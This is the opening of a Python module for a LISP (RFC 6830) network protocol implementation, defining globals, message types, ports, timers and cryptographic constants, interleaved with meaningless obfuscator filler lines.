# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
from __future__ import print_function
from __future__ import division
from future import standard_library
standard_library . install_aliases ( )
from builtins import chr
from builtins import hex
from builtins import str
from builtins import range
from builtins import object
from past . utils import old_div
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import traceback
from Crypto . Cipher import AES
import ecdsa
import json
import copy
import chacha
import poly1305
import geopy
import curve25519
from subprocess import getoutput
import queue
import distro
if 64 - 64: i11iIiiIii
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
lisp_print_rloc_probe_list = False
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
if 30 - 30: o0oOOo0O0Ooo - O0 % o0oOOo0O0Ooo - OoooooooOO * O0 * OoooooooOO
if 60 - 60: iIii1I11I1II1 / i1IIi * oO0o - I1ii11iIi11i + o0oOOo0O0Ooo
if 94 - 94: i1IIi % Oo0Ooo
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
if 68 - 68: Ii1I / O0
lisp_map_notify_queue = { }
lisp_map_servers_list = { }
lisp_ddt_map_requestQ = { }
lisp_db_list = [ ]
lisp_group_mapping_list = { }
lisp_map_resolvers_list = { }
lisp_rtr_list = { }
lisp_elp_list = { }
lisp_rle_list = { }
lisp_geo_list = { }
lisp_json_list = { }
lisp_myrlocs = [ None , None , None ]
lisp_mymacs = { }
if 46 - 46: O0 * II111iiii / IiII * Oo0Ooo * iII111i . I11i
if 62 - 62: i11iIiiIii - II111iiii % I1Ii111 - iIii1I11I1II1 . I1ii11iIi11i . II111iiii
if 61 - 61: oO0o / OoOoOO00 / iII111i * OoO0O00 . II111iiii
if 1 - 1: II111iiii - I1ii11iIi11i % i11iIiiIii + IiII . I1Ii111
if 55 - 55: iIii1I11I1II1 - I1IiiI . Ii1I * IiII * i1IIi / iIii1I11I1II1
lisp_myinterfaces = { }
lisp_iid_to_interface = { }
lisp_multi_tenant_interfaces = [ ]
if 79 - 79: oO0o + I1Ii111 . ooOoO0o * IiII % I11i . I1IiiI
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
if 94 - 94: iII111i * Ii1I / IiII . i1IIi * iII111i
if 47 - 47: i1IIi % i11iIiiIii
if 20 - 20: ooOoO0o * II111iiii
if 65 - 65: o0oOOo0O0Ooo * iIii1I11I1II1 * ooOoO0o
lisp_registered_count = 0
if 18 - 18: iIii1I11I1II1 / I11i + oO0o / Oo0Ooo - II111iiii - I11i
if 1 - 1: I11i - OOooOOo % O0 + I1IiiI - iII111i / I11i
if 31 - 31: OoO0O00 + II111iiii
if 13 - 13: OOooOOo * oO0o * I1IiiI
lisp_info_sources_by_address = { }
lisp_info_sources_by_nonce = { }
if 55 - 55: II111iiii
if 43 - 43: OoOoOO00 - i1IIi + I1Ii111 + Ii1I
if 17 - 17: o0oOOo0O0Ooo
if 64 - 64: Ii1I % i1IIi % OoooooooOO
if 3 - 3: iII111i + O0
if 42 - 42: OOooOOo / i1IIi + i11iIiiIii - Ii1I
lisp_crypto_keys_by_nonce = { }
lisp_crypto_keys_by_rloc_encap = { }
lisp_crypto_keys_by_rloc_decap = { }
lisp_data_plane_security = False
lisp_search_decap_keys = True
if 78 - 78: OoO0O00
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
if 18 - 18: O0 - iII111i / iII111i + ooOoO0o % ooOoO0o - IiII
if 62 - 62: iII111i - IiII - OoOoOO00 % i1IIi / oO0o
if 77 - 77: II111iiii - II111iiii . I1IiiI / o0oOOo0O0Ooo
if 14 - 14: I11i % O0
if 41 - 41: i1IIi + I1Ii111 + OOooOOo - IiII
if 77 - 77: Oo0Ooo . IiII % ooOoO0o
if 42 - 42: oO0o - i1IIi / i11iIiiIii + OOooOOo + OoO0O00
lisp_crypto_ephem_port = None
if 17 - 17: oO0o . Oo0Ooo . I1ii11iIi11i
if 3 - 3: OoOoOO00 . Oo0Ooo . I1IiiI / Ii1I
if 38 - 38: II111iiii % i11iIiiIii . ooOoO0o - OOooOOo + Ii1I
if 66 - 66: OoooooooOO * OoooooooOO . OOooOOo . i1IIi - OOooOOo
lisp_pitr = False
if 77 - 77: I11i - iIii1I11I1II1
if 82 - 82: i11iIiiIii . OOooOOo / Oo0Ooo * O0 % oO0o % iIii1I11I1II1
if 78 - 78: iIii1I11I1II1 - Ii1I * OoO0O00 + o0oOOo0O0Ooo + iII111i + iII111i
if 11 - 11: iII111i - OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
lisp_l2_overlay = False
if 74 - 74: iII111i * O0
if 89 - 89: oO0o + Oo0Ooo
if 3 - 3: i1IIi / I1IiiI % I11i * i11iIiiIii / O0 * I11i
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
if 48 - 48: I11i + I11i / II111iiii / iIii1I11I1II1
lisp_rloc_probing = False
lisp_rloc_probe_list = { }
if 20 - 20: o0oOOo0O0Ooo
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
lisp_register_all_rtrs = True
if 53 - 53: IiII + I1IiiI * oO0o
if 61 - 61: i1IIi * OOooOOo / OoooooooOO . i11iIiiIii . OoOoOO00
if 60 - 60: I11i / I11i
if 46 - 46: Ii1I * OOooOOo - OoO0O00 * oO0o - I1Ii111
lisp_nonce_echoing = False
lisp_nonce_echo_list = { }
if 83 - 83: OoooooooOO
if 31 - 31: II111iiii - OOooOOo . I1Ii111 % OoOoOO00 - O0
if 4 - 4: II111iiii / ooOoO0o . iII111i
if 58 - 58: OOooOOo * i11iIiiIii / OoOoOO00 % I1Ii111 - I1ii11iIi11i / oO0o
lisp_nat_traversal = False
if 50 - 50: I1IiiI
if 34 - 34: I1IiiI * II111iiii % iII111i * OoOoOO00 - I1IiiI
if 33 - 33: o0oOOo0O0Ooo + OOooOOo * OoO0O00 - Oo0Ooo / oO0o % Ii1I
if 21 - 21: OoO0O00 * iIii1I11I1II1 % oO0o * i1IIi
if 16 - 16: O0 - I1Ii111 * iIii1I11I1II1 + iII111i
if 50 - 50: II111iiii - ooOoO0o * I1ii11iIi11i / I1Ii111 + o0oOOo0O0Ooo
if 88 - 88: Ii1I / I1Ii111 + iII111i - II111iiii / ooOoO0o - OoOoOO00
if 15 - 15: I1ii11iIi11i + OoOoOO00 - OoooooooOO / OOooOOo
lisp_program_hardware = False
if 58 - 58: i11iIiiIii % I11i
if 71 - 71: OOooOOo + ooOoO0o % i11iIiiIii + I1ii11iIi11i - IiII
if 88 - 88: OoOoOO00 - OoO0O00 % OOooOOo
if 16 - 16: I1IiiI * oO0o % IiII
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
if 86 - 86: I1IiiI + Ii1I % i11iIiiIii * oO0o . ooOoO0o * I11i
if 44 - 44: oO0o
if 88 - 88: I1Ii111 % Ii1I . II111iiii
if 38 - 38: o0oOOo0O0Ooo
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
if 57 - 57: O0 / oO0o * I1Ii111 / OoOoOO00 . II111iiii
if 26 - 26: iII111i
if 91 - 91: OoO0O00 . I1ii11iIi11i + OoO0O00 - iII111i / OoooooooOO
if 39 - 39: I1ii11iIi11i / ooOoO0o - II111iiii
if 98 - 98: I1ii11iIi11i / I11i % oO0o . OoOoOO00
lisp_ipc_lock = None
if 91 - 91: oO0o % Oo0Ooo
if 64 - 64: I11i % iII111i - I1Ii111 - oO0o
if 31 - 31: I11i - II111iiii . I11i
if 18 - 18: o0oOOo0O0Ooo
if 98 - 98: iII111i * iII111i / iII111i + I11i
if 34 - 34: ooOoO0o
lisp_default_iid = 0
lisp_default_secondary_iid = 0
if 15 - 15: I11i * ooOoO0o * Oo0Ooo % i11iIiiIii % OoOoOO00 - OOooOOo
if 68 - 68: I1Ii111 % i1IIi . IiII . I1ii11iIi11i
if 92 - 92: iII111i . I1Ii111
if 31 - 31: I1Ii111 . OoOoOO00 / O0
if 89 - 89: OoOoOO00
lisp_ms_rtr_list = [ ]
if 68 - 68: OoO0O00 * OoooooooOO % O0 + OoO0O00 + ooOoO0o
if 4 - 4: ooOoO0o + O0 * OOooOOo
if 55 - 55: Oo0Ooo + iIii1I11I1II1 / OoOoOO00 * oO0o - i11iIiiIii - Ii1I
if 25 - 25: I1ii11iIi11i
if 7 - 7: i1IIi / I1IiiI * I1Ii111 . IiII . iIii1I11I1II1
if 13 - 13: OOooOOo / i11iIiiIii
lisp_nat_state_info = { }
if 2 - 2: I1IiiI / O0 / o0oOOo0O0Ooo % OoOoOO00 % Ii1I
if 52 - 52: o0oOOo0O0Ooo
if 95 - 95: Ii1I
if 87 - 87: ooOoO0o + OoOoOO00 . OOooOOo + OoOoOO00
if 91 - 91: O0
if 61 - 61: II111iiii
lisp_last_map_request_sent = None
lisp_no_map_request_rate_limit = time . time ( )
if 64 - 64: ooOoO0o / OoOoOO00 - O0 - I11i
if 86 - 86: I11i % OoOoOO00 / I1IiiI / OoOoOO00
if 42 - 42: OoO0O00
if 67 - 67: I1Ii111 . iII111i . O0
lisp_last_icmp_too_big_sent = 0
if 10 - 10: I1ii11iIi11i % I1ii11iIi11i - iIii1I11I1II1 / OOooOOo + Ii1I
if 87 - 87: oO0o * I1ii11iIi11i + OOooOOo / iIii1I11I1II1 / iII111i
if 37 - 37: iII111i - ooOoO0o * oO0o % i11iIiiIii - I1Ii111
if 83 - 83: I11i / I1IiiI
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = [ ]
if 34 - 34: IiII
if 57 - 57: oO0o . I11i . i1IIi
if 42 - 42: I11i + I1ii11iIi11i % O0
if 6 - 6: oO0o
lisp_policies = { }
if 68 - 68: OoOoOO00 - OoO0O00
if 28 - 28: OoO0O00 . OOooOOo / OOooOOo + Oo0Ooo . I1ii11iIi11i
if 1 - 1: iIii1I11I1II1 / II111iiii
if 33 - 33: I11i
if 18 - 18: o0oOOo0O0Ooo % iII111i * O0
lisp_load_split_pings = False
if 87 - 87: i11iIiiIii
if 93 - 93: I1ii11iIi11i - OoO0O00 % i11iIiiIii . iII111i / iII111i - I1Ii111
if 9 - 9: I1ii11iIi11i / Oo0Ooo - I1IiiI / OoooooooOO / iIii1I11I1II1 - o0oOOo0O0Ooo
if 91 - 91: iII111i % i1IIi % iIii1I11I1II1
if 20 - 20: OOooOOo % Ii1I / Ii1I + Ii1I
if 45 - 45: oO0o - IiII - OoooooooOO - OoO0O00 . II111iiii / O0
lisp_eid_hashes = [ ]
if 51 - 51: O0 + iII111i
if 8 - 8: oO0o * OoOoOO00 - Ii1I - OoO0O00 * OOooOOo % I1IiiI
if 48 - 48: O0
if 11 - 11: I11i + OoooooooOO - OoO0O00 / o0oOOo0O0Ooo + Oo0Ooo . II111iiii
if 41 - 41: Ii1I - O0 - O0
if 68 - 68: OOooOOo % I1Ii111
if 88 - 88: iIii1I11I1II1 - ooOoO0o + OOooOOo
if 40 - 40: I1IiiI * Ii1I + OOooOOo % iII111i
lisp_reassembly_queue = { }
if 74 - 74: oO0o - Oo0Ooo + OoooooooOO + I1Ii111 / OoOoOO00
if 23 - 23: O0
if 85 - 85: Ii1I
if 84 - 84: I1IiiI . iIii1I11I1II1 % OoooooooOO + Ii1I % OoooooooOO % OoO0O00
if 42 - 42: OoO0O00 / I11i / o0oOOo0O0Ooo + iII111i / OoOoOO00
if 84 - 84: ooOoO0o * II111iiii + Oo0Ooo
if 53 - 53: iII111i % II111iiii . IiII - iIii1I11I1II1 - IiII * II111iiii
lisp_pubsub_cache = { }
if 77 - 77: iIii1I11I1II1 * OoO0O00
if 95 - 95: I1IiiI + i11iIiiIii
if 6 - 6: ooOoO0o / i11iIiiIii + iII111i * oO0o
if 80 - 80: II111iiii
if 83 - 83: I11i . i11iIiiIii + II111iiii . o0oOOo0O0Ooo * I11i
if 53 - 53: II111iiii
lisp_decent_push_configured = False
if 31 - 31: OoO0O00
if 80 - 80: I1Ii111 . i11iIiiIii - o0oOOo0O0Ooo
if 25 - 25: OoO0O00
if 62 - 62: OOooOOo + O0
if 98 - 98: o0oOOo0O0Ooo
if 51 - 51: Oo0Ooo - oO0o + II111iiii * Ii1I . I11i + oO0o
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
if 78 - 78: i11iIiiIii / iII111i - Ii1I / OOooOOo + oO0o
if 82 - 82: Ii1I
if 46 - 46: OoooooooOO . i11iIiiIii
if 94 - 94: o0oOOo0O0Ooo * Ii1I / Oo0Ooo / Ii1I
if 87 - 87: Oo0Ooo . IiII
if 75 - 75: ooOoO0o + OoOoOO00 + o0oOOo0O0Ooo * I11i % oO0o . iII111i
lisp_ipc_socket = None
if 55 - 55: OOooOOo . I1IiiI
if 61 - 61: Oo0Ooo % IiII . Oo0Ooo
if 100 - 100: I1Ii111 * O0
if 64 - 64: OOooOOo % iIii1I11I1II1 * oO0o
lisp_ms_encryption_keys = { }
lisp_ms_json_keys = { }
if 79 - 79: O0
if 78 - 78: I1ii11iIi11i + OOooOOo - I1Ii111
if 38 - 38: o0oOOo0O0Ooo - oO0o + iIii1I11I1II1 / OoOoOO00 % Oo0Ooo
if 57 - 57: OoO0O00 / ooOoO0o
if 29 - 29: iIii1I11I1II1 + OoOoOO00 * OoO0O00 * OOooOOo . I1IiiI * I1IiiI
if 7 - 7: IiII * I1Ii111 % Ii1I - o0oOOo0O0Ooo
if 13 - 13: Ii1I . i11iIiiIii
if 56 - 56: I1ii11iIi11i % O0 - I1IiiI
if 100 - 100: Ii1I - O0 % oO0o * OOooOOo + I1IiiI
if 88 - 88: OoooooooOO - OoO0O00 * O0 * OoooooooOO . OoooooooOO
if 33 - 33: I1Ii111 + iII111i * oO0o / iIii1I11I1II1 - I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
if 57 - 57: i11iIiiIii . I1ii11iIi11i - Ii1I - oO0o + OoOoOO00
if 63 - 63: OoOoOO00 * iII111i
lisp_rtr_nat_trace_cache = { }
if 69 - 69: O0 . OoO0O00
if 49 - 49: I1IiiI - I11i
if 74 - 74: iIii1I11I1II1 * I1ii11iIi11i + OoOoOO00 / i1IIi / II111iiii . Oo0Ooo
if 62 - 62: OoooooooOO * I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
if 50 - 50: I1Ii111 . o0oOOo0O0Ooo
if 97 - 97: O0 + OoOoOO00
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
if 37 - 37: OoooooooOO - O0 - o0oOOo0O0Ooo
if 77 - 77: OOooOOo * iIii1I11I1II1
lisp_glean_mappings = [ ]
if 98 - 98: I1IiiI % Ii1I * OoooooooOO
if 51 - 51: iIii1I11I1II1 . OoOoOO00 / oO0o + o0oOOo0O0Ooo
if 33 - 33: ooOoO0o . II111iiii % iII111i + o0oOOo0O0Ooo
if 71 - 71: Oo0Ooo % OOooOOo
if 98 - 98: I11i % i11iIiiIii % ooOoO0o + Ii1I
if 78 - 78: I1ii11iIi11i % oO0o / iII111i - iIii1I11I1II1
if 69 - 69: I1Ii111
if 11 - 11: I1IiiI
if 16 - 16: Ii1I + IiII * O0 % i1IIi . I1IiiI
if 67 - 67: OoooooooOO / I1IiiI * Ii1I + I11i
if 65 - 65: OoooooooOO - I1ii11iIi11i / ooOoO0o / II111iiii / i1IIi
if 71 - 71: I1Ii111 + Ii1I
if 28 - 28: OOooOOo
if 38 - 38: ooOoO0o % II111iiii % I11i / OoO0O00 + OoOoOO00 / i1IIi
if 54 - 54: iIii1I11I1II1 % I1ii11iIi11i - OOooOOo / oO0o - OoO0O00 . I11i
if 11 - 11: I1ii11iIi11i . OoO0O00 * IiII * OoooooooOO + ooOoO0o
if 33 - 33: O0 * o0oOOo0O0Ooo - I1Ii111 % I1Ii111
if 18 - 18: I1Ii111 / Oo0Ooo * I1Ii111 + I1Ii111 * i11iIiiIii * I1ii11iIi11i
if 11 - 11: ooOoO0o / OoOoOO00 - IiII * OoooooooOO + OoooooooOO . OoOoOO00
lisp_gleaned_groups = { }
if 26 - 26: Ii1I % I1ii11iIi11i
if 76 - 76: IiII * iII111i
if 52 - 52: OOooOOo
if 19 - 19: I1IiiI
if 25 - 25: Ii1I / ooOoO0o
lisp_icmp_raw_socket = None
if ( os . getenv ( "LISP_SEND_ICMP_TOO_BIG" ) != None ) :
lisp_icmp_raw_socket = socket . socket ( socket . AF_INET , socket . SOCK_RAW ,
socket . IPPROTO_ICMP )
lisp_icmp_raw_socket . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
if 31 - 31: OOooOOo . O0 % I1IiiI . o0oOOo0O0Ooo + IiII
if 71 - 71: I1Ii111 . II111iiii
lisp_ignore_df_bit = ( os . getenv ( "LISP_IGNORE_DF_BIT" ) != None )
if 62 - 62: OoooooooOO . I11i
if 61 - 61: OoOoOO00 - OOooOOo - i1IIi
if 25 - 25: O0 * I11i + I1ii11iIi11i . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 58 - 58: I1IiiI
if 53 - 53: i1IIi
if 59 - 59: o0oOOo0O0Ooo
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
if 81 - 81: OoOoOO00 - OoOoOO00 . iII111i
if 73 - 73: I11i % i11iIiiIii - I1IiiI
if 7 - 7: O0 * i11iIiiIii * Ii1I + ooOoO0o % OoO0O00 - ooOoO0o
if 39 - 39: Oo0Ooo * OOooOOo % OOooOOo - OoooooooOO + o0oOOo0O0Ooo - I11i
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9
if 23 - 23: i11iIiiIii
if 30 - 30: o0oOOo0O0Ooo - i1IIi % II111iiii + I11i * iIii1I11I1II1
if 81 - 81: IiII % i1IIi . iIii1I11I1II1
if 4 - 4: i11iIiiIii % OoO0O00 % i1IIi / IiII
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
LISP_SEND_PUBSUB_ACTION = 6
if 6 - 6: iII111i / I1IiiI % OOooOOo - I1IiiI
lisp_map_reply_action_string = [ "no-action" , "native-forward" ,
"send-map-request" , "drop-action" , "policy-denied" ,
"auth-failure" , "send-subscribe" ]
if 31 - 31: OOooOOo
if 23 - 23: I1Ii111 . IiII
if 92 - 92: OoOoOO00 + I1Ii111 * Ii1I % I1IiiI
if 42 - 42: Oo0Ooo
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32
if 76 - 76: I1IiiI * iII111i % I1Ii111
if 57 - 57: iIii1I11I1II1 - i1IIi / I1Ii111 - O0 * OoooooooOO % II111iiii
if 68 - 68: OoooooooOO * I11i % OoOoOO00 - IiII
if 34 - 34: I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / I1Ii111 / I1ii11iIi11i
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16
if 78 - 78: Oo0Ooo - o0oOOo0O0Ooo / OoOoOO00
if 10 - 10: iII111i + Oo0Ooo * I1ii11iIi11i + iIii1I11I1II1 / I1Ii111 / I1ii11iIi11i
if 42 - 42: I1IiiI
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
LISP_MR_TTL = ( 24 * 60 )
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_MCAST_TTL = 15
LISP_IGMP_TTL = 240
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60
LISP_TEST_MR_INTERVAL = 60
LISP_MAP_NOTIFY_INTERVAL = 2
LISP_DDT_MAP_REQUEST_INTERVAL = 2
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15
LISP_MAP_REQUEST_RATE_LIMIT = .5
LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME = 60
LISP_ICMP_TOO_BIG_RATE_LIMIT = 1
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
LISP_RLOC_PROBE_TTL = 128
LISP_RLOC_PROBE_INTERVAL = 10
LISP_RLOC_PROBE_REPLY_WAIT = 15
LISP_DEFAULT_DYN_EID_TIMEOUT = 15
LISP_NONCE_ECHO_INTERVAL = 10
LISP_IGMP_TIMEOUT_INTERVAL = 180
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
if 69 - 69: IiII - O0 % I1ii11iIi11i + i11iIiiIii . OoOoOO00 / OoO0O00
if 79 - 79: O0 * i11iIiiIii - IiII / IiII
if 48 - 48: O0
if 93 - 93: i11iIiiIii - I1IiiI * I1ii11iIi11i * I11i % O0 + OoooooooOO
if 25 - 25: IiII + Ii1I / ooOoO0o . o0oOOo0O0Ooo % O0 * OoO0O00
if 84 - 84: ooOoO0o % Ii1I + i11iIiiIii
if 28 - 28: Oo0Ooo + OoO0O00 * OOooOOo % oO0o . I11i % O0
if 16 - 16: I11i - iIii1I11I1II1 / I1IiiI . II111iiii + iIii1I11I1II1
if 19 - 19: OoO0O00 - Oo0Ooo . O0
if 60 - 60: II111iiii + Oo0Ooo
if 9 - 9: ooOoO0o * OoooooooOO - iIii1I11I1II1 + OoOoOO00 / OoO0O00 . OoO0O00
if 49 - 49: II111iiii
if 25 - 25: OoooooooOO - I1IiiI . I1IiiI * oO0o
if 81 - 81: iII111i + IiII
if 98 - 98: I1IiiI
if 95 - 95: ooOoO0o / ooOoO0o
if 30 - 30: I1ii11iIi11i + Oo0Ooo / Oo0Ooo % I1ii11iIi11i . I1ii11iIi11i
if 55 - 55: ooOoO0o - I11i + II111iiii + iII111i % Ii1I
if 41 - 41: i1IIi - I11i - Ii1I
if 8 - 8: OoO0O00 + I1Ii111 - o0oOOo0O0Ooo % Oo0Ooo % o0oOOo0O0Ooo * oO0o
if 9 - 9: Oo0Ooo - i11iIiiIii - OOooOOo * Ii1I + ooOoO0o
if 44 - 44: II111iiii
if 52 - 52: I1ii11iIi11i - Oo0Ooo + I1ii11iIi11i % o0oOOo0O0Ooo
if 35 - 35: iIii1I11I1II1
if 42 - 42: I1Ii111 . I1IiiI . i1IIi + OoOoOO00 + OOooOOo + I1IiiI
if 31 - 31: iII111i . OOooOOo - ooOoO0o . OoooooooOO / OoooooooOO
if 56 - 56: OoO0O00 / oO0o / i11iIiiIii + OoooooooOO - Oo0Ooo - I11i
if 21 - 21: O0 % IiII . I1IiiI / II111iiii + IiII
if 53 - 53: oO0o - I1IiiI - oO0o * iII111i
if 71 - 71: O0 - iIii1I11I1II1
if 12 - 12: OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
if 46 - 46: Oo0Ooo
if 1 - 1: iII111i
if 97 - 97: OOooOOo + iII111i + O0 + i11iIiiIii
if 77 - 77: o0oOOo0O0Ooo / OoooooooOO
if 46 - 46: o0oOOo0O0Ooo % iIii1I11I1II1 . iII111i % iII111i + i11iIiiIii
if 72 - 72: iIii1I11I1II1 * Ii1I % ooOoO0o / OoO0O00
if 35 - 35: ooOoO0o + i1IIi % I1ii11iIi11i % I11i + oO0o
if 17 - 17: i1IIi
if 21 - 21: Oo0Ooo
if 29 - 29: I11i / II111iiii / ooOoO0o * OOooOOo
if 10 - 10: I1Ii111 % IiII * IiII . I11i / Ii1I % OOooOOo
if 49 - 49: OoO0O00 / oO0o + O0 * o0oOOo0O0Ooo
if 28 - 28: ooOoO0o + i11iIiiIii / I11i % OoOoOO00 % Oo0Ooo - O0
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
if 54 - 54: i1IIi + II111iiii
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
if 83 - 83: I1ii11iIi11i - I1IiiI + OOooOOo
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
if 5 - 5: Ii1I
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
if 46 - 46: IiII
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
if 45 - 45: ooOoO0o
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
if 21 - 21: oO0o . I1Ii111 . OOooOOo / Oo0Ooo / I1Ii111
use_chacha = ( os . getenv ( "LISP_USE_CHACHA" ) != None )
use_poly = ( os . getenv ( "LISP_USE_POLY" ) != None )
if 17 - 17: OOooOOo / OOooOOo / I11i
if 1 - 1: i1IIi . i11iIiiIii % OOooOOo
if 82 - 82: iIii1I11I1II1 + Oo0Ooo . iIii1I11I1II1 % IiII / Ii1I . Ii1I
if 14 - 14: o0oOOo0O0Ooo . OOooOOo . I11i + OoooooooOO - OOooOOo + IiII
if 9 - 9: Ii1I
if 59 - 59: I1IiiI * II111iiii . O0
if 56 - 56: Ii1I - iII111i % I1IiiI - o0oOOo0O0Ooo
if 51 - 51: O0 / ooOoO0o * iIii1I11I1II1 + I1ii11iIi11i + o0oOOo0O0Ooo
